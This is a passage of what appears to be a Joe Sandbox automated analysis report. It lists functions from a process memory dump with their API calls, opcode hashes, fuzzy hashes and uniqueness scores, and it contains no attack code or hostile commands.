                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$CurrentDirectorytowupper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1403193329-0
                                                                                                                    • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                                                                                                    • Instruction ID: 7bf29877bd7e2c554bd932d91fb89544e47ac15b1852428020ed26539943cab5
                                                                                                                    • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                                                                                                    • Instruction Fuzzy Hash: 7561AF32B08B868AFB20EF6198442ADBBB4FB84B59FA44234DE5D17799DF38D450C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD4878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsnicmp$wcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3270668897-0
                                                                                                                    • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                                                    • Instruction ID: e8bfbebfb92f461281fdaf94d9139b8a6064c94f51c4f2865decc7d0d2343290
                                                                                                                    • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                                                    • Instruction Fuzzy Hash: 0C516C11E0864A85EAA1BF1294181B9EBB1FF45F92FE88131DA5E072D5EF2CE941C370
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEF358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$DriveFullNamePathType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3442494845-0
                                                                                                                    • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                                                                    • Instruction ID: e39e1f004797a3ae4ded9225d0bcdeb5ae6d261b7b8e02ca63cf6246854304c5
                                                                                                                    • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                                                                                                    • Instruction Fuzzy Hash: 70318C32605BC98AEB60EF21E8446E9BBA4FB88F85F944135EA4D47B54DF38D605C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD8F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 140117192-0
                                                                                                                    • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                                    • Instruction ID: c5502e4c648d9f5adb7f55ab893a44caa85ac2db7cb04120ddf4ce37ca39f9e1
                                                                                                                    • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                                    • Instruction Fuzzy Hash: 5241D935608B8A81EA50AF18F854365BB74FBC8B46FE00135DA8D43B64EF3DE448C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD8470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcstol$lstrcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3515581199-0
                                                                                                                    • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                                    • Instruction ID: e6ce32d2a6c6cc1f335b977f160e321dacab0abba2d2f0df31ee6831abd6ba0a
                                                                                                                    • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                                    • Instruction Fuzzy Hash: DB219332A0964683E6616F69A098139EEB0FB49F87FA55138DB4F02654CE6CE445C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC4F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File_get_osfhandle$TimeWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4019809305-0
                                                                                                                    • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                                    • Instruction ID: 15b16150d3b2ae61d87d383f53728dd3e98c673f8a3aa8e159256a7fc46db8f4
                                                                                                                    • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                                                                    • Instruction Fuzzy Hash: 7631A425A0878A46FB906F54944433CEAB5FF4AF62FA46234D90D437D5CF3CD844C610
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BF1914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$DriveNamePathTypeVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1029679093-0
                                                                                                                    • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                                                                    • Instruction ID: 079ddb8b0c59b8d8216150af0e65df43b58fb1edd6b9bbf7962ff6e7bc843786
                                                                                                                    • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                                                                    • Instruction Fuzzy Hash: 3D313A32705B898AEB209F21D8543E8BBA4FB89F89F944535CA4D4BB48EF3CD645C750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEE810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2448200120-0
                                                                                                                    • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                    • Instruction ID: 328f91f3691c33916e6030306fde911dad9d5aa16812817ecab035c0dec8b101
                                                                                                                    • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                    • Instruction Fuzzy Hash: 67212935A08B4A87E654AF21A80027DFAB5FB85F92FA44135E94E47B95DF3CE441CB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD7CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1617791916-0
                                                                                                                    • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                    • Instruction ID: 10312fcc1b0664fdfe49dc12609acceca57b18694c6b7308d73551ef44577fbd
                                                                                                                    • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                    • Instruction Fuzzy Hash: 992165A5708B45C6EA04AF52A9544B9FBB1FF89FD2BA49230DA1E03795DF3CE401C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC6A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF789BD3D0C
                                                                                                                      • Part of subcall function 00007FF789BD3C24: towupper.MSVCRT ref: 00007FF789BD3D2F
                                                                                                                      • Part of subcall function 00007FF789BD3C24: iswalpha.MSVCRT ref: 00007FF789BD3D4F
                                                                                                                      • Part of subcall function 00007FF789BD3C24: towupper.MSVCRT ref: 00007FF789BD3D75
                                                                                                                      • Part of subcall function 00007FF789BD3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD3DBF
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6ABF
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6AD3
                                                                                                                      • Part of subcall function 00007FF789BC6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF789BC6AE8,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B8B
                                                                                                                      • Part of subcall function 00007FF789BC6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF789BC6AE8,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B97
                                                                                                                      • Part of subcall function 00007FF789BC6B84: RtlFreeHeap.NTDLL(?,?,?,?,00007FF789BC6AE8,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6BAF
                                                                                                                      • Part of subcall function 00007FF789BC6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC6AF1,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B39
                                                                                                                      • Part of subcall function 00007FF789BC6B30: RtlFreeHeap.NTDLL(?,?,?,00007FF789BC6AF1,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B4D
                                                                                                                      • Part of subcall function 00007FF789BC6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC6AF1,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B59
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6B03
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6B17
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3512109576-0
                                                                                                                    • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                    • Instruction ID: 499a986b80efaba2e0d50c16a232d259b7eb684a3b4a5ba82981e76a65746eb0
                                                                                                                    • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                    • Instruction Fuzzy Hash: 5C214F61A09A8AC6EB04AF65D4547B8BFB0FF59F4AFA44035DA0E07351EE2CA446C370
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCB6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB6D0
                                                                                                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB6E7
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB701
                                                                                                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB715
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$AllocSize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2549470565-0
                                                                                                                    • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                    • Instruction ID: c03c291cd66ed064ba149653c82924396b453e771240d14087ab0a3abbe3ee35
                                                                                                                    • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                    • Instruction Fuzzy Hash: B5213321A0969AC6EA54AF55E44007CFEB1FF88F96BE89431DA0E03790EF3CE545C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BECFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF789BD507A), ref: 00007FF789BED01C
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF789BD507A), ref: 00007FF789BED033
                                                                                                                    • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF789BD507A), ref: 00007FF789BED06D
                                                                                                                    • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF789BD507A), ref: 00007FF789BED07F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1033415088-0
                                                                                                                    • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                    • Instruction ID: 156e8f959997575f16762ade3321730fbf212a8ad50b422e42a96387fd5bea48
                                                                                                                    • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                    • Instruction Fuzzy Hash: 67116031618A8686DA449F20F05417AFBB0FBCAF96F945135EA8E47B54EF3CD045CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC59E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
